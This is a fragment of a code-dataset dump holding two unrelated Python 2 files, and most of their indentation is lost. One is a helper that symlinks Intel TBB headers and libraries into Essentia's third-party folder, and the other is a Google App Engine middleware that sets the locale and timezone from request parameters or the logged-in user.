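#     sudo ln -s /essentia/third_party/tbb20_020oss_src/include/tbb \
#         /essentia/third_party/include/tbb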
def link_tbb_files() :
source = [tbb_src + 'include/tbb',
tbb_mac + 'lib/libtbb.dylib',
tbb_mac + 'lib/libtbb_debug.dylib',
tbb_mac + 'lib/libtbbmalloc.dylib',
tbb_mac + 'lib/libtbbmalloc_debug.dylib']
target = [essentia_third_party + 'include/tbb',
essentia_third_party + 'lib/libtbb.dylib',
essentia_third_party + 'lib/libtbb_debug.dylib',
essentia_third_party + 'lib/libtbbmalloc.dylib',
essentia_third_party + 'lib/libtbbmalloc_debug.dylib']
ret = 0
for i in range(len(source)):
ret += link(source[i], target[i])
return ret
if __name__ == '__main__':
    ret = link_tbb_files()
print "returning ", ret
exit(ret)
| agpl-3.0 |
faahbih/projetoolivarts | backend/appengine/apps/locale_app/middleware.py | 48 | 1406 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from webapp2_extras import i18n
from tekton.gae.middleware import Middleware
class LocaleMiddleware(Middleware):
def _handle(self, locale_key):
if locale_key in self.request_args:
locale = self.request_args.get(locale_key, '')
print 'Locale ' + locale_key
self.request_args.pop(locale_key)
if locale:
locale_obj = i18n.get_i18n()
locale_obj.set_locale(locale)
import settings # this is here to avoid cyclic dependency
locale_obj.set_timezone(settings.DEFAULT_TIMEZONE)
return True
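    # Illustrative flow (a sketch, not from the original source, assuming the
    # framework maps query-string parameters into request_args): a request
    # such as /products?locale=pt_BR puts 'pt_BR' under the 'locale' key, so
    # _handle('locale') pops it, switches the i18n locale for the request and
    # resets the timezone to settings.DEFAULT_TIMEZONE. In set_up below, a
    # logged-in user's saved locale and timezone take precedence.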
def set_up(self):
handled = self._handle('locale')
        # the Facebook scraper sends an undesired fb_locale param
handled = self._handle('fb_locale') or handled
user = self.dependencies['_logged_user']
import settings # this is here to avoid cyclic dependency
if user:
locale_obj = i18n.get_i18n()
locale_obj.set_locale(user.locale or settings.DEFAULT_LOCALE)
locale_obj.set_timezone(user.timezone or settings.DEFAULT_TIMEZONE)
elif not handled:
locale_obj = i18n.get_i18n()
locale_obj.set_locale(settings.DEFAULT_LOCALE)
locale_obj.set_timezone(settings.DEFAULT_TIMEZONE)
| mit |